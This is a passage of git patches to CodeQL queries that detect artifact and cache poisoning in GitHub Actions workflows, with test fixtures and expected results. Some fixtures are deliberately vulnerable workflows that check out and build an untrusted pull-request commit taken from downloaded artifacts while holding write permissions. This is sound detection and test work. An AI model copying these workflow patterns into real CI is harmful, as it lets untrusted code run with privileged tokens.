unzipDirArgRegexp(), 2)) else result = "" } } class ArtifactPoisoningSink extends DataFlow::Node { + UntrustedArtifactDownloadStep download; + PoisonableStep poisonable; + ArtifactPoisoningSink() { - exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable | - download.getAFollowingStep() = poisonable and - ( - poisonable.(Run).getScriptScalar() = this.asExpr() - or - poisonable.(UsesStep) = this.asExpr() - ) and + download.getAFollowingStep() = poisonable and + // excluding artifacts downloaded to /tmp + not download.getPath().regexpMatch("^/tmp.*") and + ( + poisonable.(Run).getScriptScalar() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact - not poisonable instanceof LocalScriptExecutionRunStep or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + or + // TODO: account for Run's working directory poisonable .(LocalScriptExecutionRunStep) .getCommand() .matches(["./", ""] + download.getPath() + "%") ) + or + poisonable.(UsesStep) = this.asExpr() and + download.getPath() = "" ) } + + string getPath() { result = download.getPath() } } /** @@ -283,7 +291,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { * that is used may lead to artifact poisoning */ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml new file mode 100644 index 000000000000..4241647d3e11 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml new file mode 100644 index 000000000000..0c2059521020 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -0,0 +1,32 @@ +name: DownloadArtifacts +description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data' +runs: + using: "composite" + steps: + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); + - run: | + mkdir -p /tmp/artifacts + unzip /tmp/artifacts.zip -d /tmp/artifacts + shell: bash + - run: | + echo "Downloaded artifacts:" + ls -ablh /tmp/artifacts + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 000000000000..af9f01b572f1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 000000000000..e35bc73c3bda --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 11c6b98dc874..74edee72f5f1 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -45,6 +51,9 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -62,3 +71,5 @@ subpaths | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 431386fae068..079a89a498c5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,4 +1,7 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -14,7 +17,10 @@ edges | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -45,5 +51,8 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 006f365ae05c..9358d65e8f4b 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,6 +1,12 @@ edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | @@ -35,6 +41,18 @@ edges | .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | | .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 9d26a8da26db1ed4c21939f4c4442ab319108a42 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:22:35 +0200 Subject: [PATCH 545/707] Improve path checks for Artifact and Cache poisoning queries --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/Helper.qll | 27 +++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++++ .../security/ArtifactPoisoningQuery.qll | 70 ++++++++++--------- .../actions/security/CachePoisoningQuery.qll | 10 ++- .../actions/security/PoisonableSteps.qll | 10 +-- .../security/UntrustedCheckoutQuery.qll | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 25 +------ .../.github/workflows/direct_cache6.yml | 15 +--- .../.github/workflows/neg_direct_cache4.yml | 23 ++++++ .../.github/workflows/neg_direct_cache5.yml | 23 ++++++ .../CachePoisoningViaDirectCache.expected | 14 ++-- .../CachePoisoningViaPoisonableStep.expected | 12 ++-- 13 files changed, 163 insertions(+), 98 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a1651eedc47d..17b0dab4ee67 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -289,6 +289,8 @@ class Run extends Step instanceof RunImpl { ScalarValue getScriptScalar() { result = super.getScriptScalar() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } + + string getWorkingDirectory() { result = super.getWorkingDirectory() } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9356950f5717..f9fa108ec3a2 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -283,3 +283,30 @@ string getRepoRoot() { result = "" ) } + +bindingset[path] +string normalizePath(string path) { + exists(string trimmed_path | trimmed_path = trimQuotes(path) | + // ./foo -> GITHUB_WORKSPACE/foo + if path.indexOf("./") = 0 + then result = path.replaceAll("./", "GITHUB_WORKSPACE/") + else + // GITHUB_WORKSPACE/foo -> GITHUB_WORKSPACE/foo + if path.indexOf("GITHUB_WORKSPACE/") = 0 + then result = path + else + // foo -> GITHUB_WORKSPACE/foo + if path.regexpMatch("^[^/~].*") + then result = "GITHUB_WORKSPACE/" + path.regexpReplaceAll("/$", "") + else + // ~/foo -> ~/foo + // /foo -> /foo + result = path + ) +} + +/** + * Holds if the path cache_path is a subpath of the path untrusted_path. + */ +bindingset[subpath, path] +predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 154d466ab7df..5361943331b2 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1317,6 +1317,18 @@ class RunImpl extends StepImpl { override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } + + /** Gets the working directory for this `runs` mapping. */ + string getWorkingDirectory() { + if exists(n.lookup("working-directory").(YamlString).getValue()) + then + result = + n.lookup("working-directory") + .(YamlString) + .getValue() + .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") + else result = "GITHUB_WORKSPACE/" + } } /** diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 236cc4d80914..ebe22140be24 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -35,7 +35,9 @@ class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, Us } override string getPath() { - if exists(this.getArgument("path")) then result = this.getArgument("path") else result = "" + if exists(this.getArgument("path")) + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/" } } @@ -79,11 +81,11 @@ class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep override string getPath() { if exists(this.getArgument(["path", "download_path"])) - then result = this.getArgument(["path", "download_path"]) + then result = normalizePath(this.getArgument(["path", "download_path"])) else if exists(this.getArgument("paths")) - then result = this.getArgument("paths").splitAt(" ") - else result = "" + then result = normalizePath(this.getArgument("paths").splitAt(" ")) + else result = "GITHUB_WORKSPACE/" } } @@ -114,8 +116,8 @@ class LegitLabsDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, override string getPath() { if exists(this.getArgument("path")) - then result = this.getArgument("path") - else result = "./artifacts" + then result = normalizePath(this.getArgument("path")) + else result = "GITHUB_WORKSPACE/artifacts" } } @@ -161,14 +163,14 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } @@ -197,18 +199,20 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) or script.splitAt("\n").regexpMatch(unzipRegexp()) - then result = "" + then result = "GITHUB_WORKSPACE/" else none() } } @@ -244,14 +248,16 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - trimQuotes(script.splitAt("\n").regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) or + normalizePath(trimQuotes(script + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = - trimQuotes(this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2)) - else result = "" + normalizePath(trimQuotes(this.getAFollowingStep() + .(Run) + .getScript() + .splitAt("\n") + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + else result = "GITHUB_WORKSPACE/" } } @@ -268,18 +274,16 @@ class ArtifactPoisoningSink extends DataFlow::Node { ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), download.getPath()) + or // Checking the path for non local script execution steps is very difficult not poisonable instanceof LocalScriptExecutionRunStep - or - // TODO: account for Run's working directory - poisonable - .(LocalScriptExecutionRunStep) - .getCommand() - .matches(["./", ""] + download.getPath() + "%") + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), download.getPath()) ) or poisonable.(UsesStep) = this.asExpr() and - download.getPath() = "" + download.getPath() = "GITHUB_WORKSPACE/" ) } diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 56002cb2b165..a0113beed469 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -51,13 +51,17 @@ abstract class CacheWritingStep extends Step { class CacheActionUsesStep extends CacheWritingStep, UsesStep { CacheActionUsesStep() { this.getCallee() = "actions/cache" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep { CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" } - override string getPath() { result = this.(UsesStep).getArgument("path").splitAt("\n") } + override string getPath() { + result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n")) + } } class SetupRubyUsesStep extends CacheWritingStep, UsesStep { @@ -66,5 +70,5 @@ class SetupRubyUsesStep extends CacheWritingStep, UsesStep { this.getArgument("bundler-cache") = "true" } - override string getPath() { result = "vendor/bundle" } + override string getPath() { result = normalizePath("vendor/bundle") } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 